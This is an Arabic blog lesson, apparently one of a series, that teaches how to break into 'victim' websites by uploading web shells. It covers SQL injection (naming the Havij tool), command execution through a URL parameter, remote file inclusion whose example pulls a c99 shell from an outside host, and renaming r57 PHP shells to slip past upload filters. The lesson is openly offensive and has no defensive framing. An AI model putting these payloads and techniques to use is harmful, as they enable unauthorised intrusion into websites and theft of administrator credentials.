بسم الله الرحمن الرحيم
السلام عليكم ورحمة لله وبركاتة
الصلاة والسلام على اشرف المرسلين وخاتم الانبياء سيدنا محمد
درسنا اليوم هو انواع الثغرات وشرحها ..
على بركة الله
كيف يتم رفع الشيل ؟؟
رفع الشل يتم عن طريق اكتشاف ثغرة معينة تمكننا من رفع الشل
يعني الشل يتم رفعة عن طريق ثغرة.
وللثغرات انواع كثيرة, وطرق اكتشافها كثير جدا جدا.
ما هي الثغرة ؟؟
الثغرة هي خطء برمجي يقع فيه المبرمج اثناء برمجتة لشيء.
ولكي تتمكن من استهداف موقع معين يجب عليك البحث عن ثغرات لكي تتمكن من رفع الشل وتخترق موقع الهدف.
وليس شرطا ان تكون هذه الثغرات داخل موقع الهدف.!
يعني لو كان الموقع المستهدف ما فية ثغرات نتركة مثلا ؟!؟
بالطبع لا.
بعد ان قمنا بجمع معلومات عن موقع الهدف (الي تحدثنا عنها بدرسنا السابق) هذه المعلومات هي التي ستساعدنا وتوصلنا الى اختراق الموقع
كيف ذلك ؟؟
لنفترض انه موقع الهدف ما فيه ثغرات اوك ؟
طيب الان بعد ان انتهينا من جمع معلومات عن موقع الهدف
مثل: مواقع السيرفر، استضافة السيرفر، IP السيرفر ...الخ
هؤلاء هم من سيمكنوننا من دعس موقع الهدف
تقلي كيف ذلك ؟؟
اقلك راجع الدرس السابق, تعرف
لانه هذا كلة حكيتة بالدرس السابق وما بدي ارجع احكية كمان مرة
مش لاني بدي اختصر
بس لاني لو اسا بدي احكيلكم كيف نستفيد من المعلومات الي جمعناها رح يكون نفس الحكي الي حكيتة بالدرس السابق.
لهيك راجع الدرس السابق الله يستر عليك
طيب يلا نبدء بالتحدث على بعض انواع الثغرات ونشرحها
1- sql injection | سكيول انجكشن | أس كيو أل انجكشن | ثغرات الحقن.
ما هي هذه الثغرة, وما هو مفعولها ؟؟
هذه الثغره روعة لانها الاكثر انتشار في هذه الايام وضروري جدا جدا ان تتعلمها لانها تفيدك كثير وتحتاجها كثير
هذه الثغره ليس مثل باقي الثغرات, يعني ثغرات الحقن SQL Injection تختلف عن باقي انواع الثغرات.
لانك تحتاج الى خبرة لكي تتمكن من استغلال هذه الثغرات
مفعولها:: بعد حقنك للموقع المصاب>> ستتمكن من سحب يوزر وباسوورد الادمن, وغالبا تكون مشفر.
تفضلو هذه دورة اسديلي لتعليم ثغرات الحقن sql injection
http://www.aljyyosh.com/vb/forumdisplay.php?f=76
وكذلك يوجد برامج لاستغلال هذه الثغرات, ومن اشهر واقوى البرامج لاستغلال ثغرات الحقن برنامج هافج Havij
2- Command Execution | ثغرة الكوماند | تنفيذ الاوامر.
ما هي هذه الثغرة, وما هو مفعولها ؟؟
هي الثغره جميله جدا. تمكنك من تنفيذ اوامر الينكس مباشر على الموقع دون حاجة للشل, وهذه الثغرة تعد من اخطر الثغرات
مثال على الثغرة:
كود:
www.site.com/qtronix.php?fox=ls -la
www.site.com: موقع الضحية او الموقع الي يتواجد بداخلة او يملك الثغرة.
qtronix.php?: اسم الملف المصاب بالثغرة.
fox=: المتغيير المصاب والي رح يتم تنفيذ اوامر الينكس عليه.
ls -la: امر من اوامر الينكس
وظيفتة: يعرض لك جميع الملفات والمجلدات + تصاريحها + وقت انشائها ..الخ
وبالنسبة لاوامر الينكس, سبق وتحدثنا عنها وشرحناها بالتفضيل الممل وبالفيديو.
وبأمكانك مراجعة درس اوامر الينكس من هنا
القسم الاول
http://www.aljyyosh.com/vb/showthread.php?t=33974
القسم الثاني
http://www.aljyyosh.com/vb/showthread.php?t=33977
3-Remote File Inclusion | ثغرات فايل انكلود.
ما هي هذه الثغرة, وما هو مفعولها ؟؟
ثغرة رائعة وجميلة جدا وايضا هذة تعد من اخطر الثغرات.
تمكنك من رفع شل مباشر على الموقع, كل ما تحتاجه هو فقط شل بأمتداد txt مرفوع على موقع.
مثال على الثغرة:
كود:
http://www.site.com/qtronix.php?fox=http://www.sh3ll.org/c99.txt?
www.site.com: موقع الضحية او الموقع الي يتواجد بداخلة او يملك الثغرة.
qtronix.php?: اسم الملف المصاب بالثغرة.
fox=: المتغيير المصاب والذي ستم وضع رابط الشل الي بامتداد txt عليه.
http://www.sh3ll.org/c99.txt?: هذا هو رابط الشل الي بامتداد txt, ويجب وضع علامة السؤال [؟] في نهاية رابط الشل عشان يستعرض معك الشل ..
4- Remote File Upload | ريموت فايل ابلود | ثغرة الرفع | ثغرة الابلود.
ما هي هذه الثغرة, وما هو مفعولها ؟؟
ثغرة رائعة وجميلة جدا وايضا هذة الثغرة تعد من اخطر الثغرات, تمكنك من رفع الشل.
تتواجد هذه الثغرات في مراكز الرفع ..
طبعا لن تكون هذه الثغرة في جميع مراكز الرفع.! بالطبع لا. اسمها ثغرة, (يعني خطء برمجي / غباء من المبرمج)
يوجد مراكز رفع تسمح لك برفع ملفات بامتداد PHP
وفي حال ما رفع معك ملف الـ PHP (الشل), بأمكانك ان تقوم بتغيير امتداد الشل الى صيغة صورة او تضغطه بالـ WinRAR ..
مثال:
r57.php.zip / r57.php.rar / r57.php.jpg ...
وفي حال ما ضبطو معك الطريقتين.. معناته المركز ما فيه ثغرة الريموت فايل ابلود, Remote File Upload
انتهى الدرس
اتمنى انه قد كان درس واضح ومفهوم للجميع..
ولا تنسو من صالح دعائكم..
تحياتي ..
ليست هناك تعليقات:
إرسال تعليق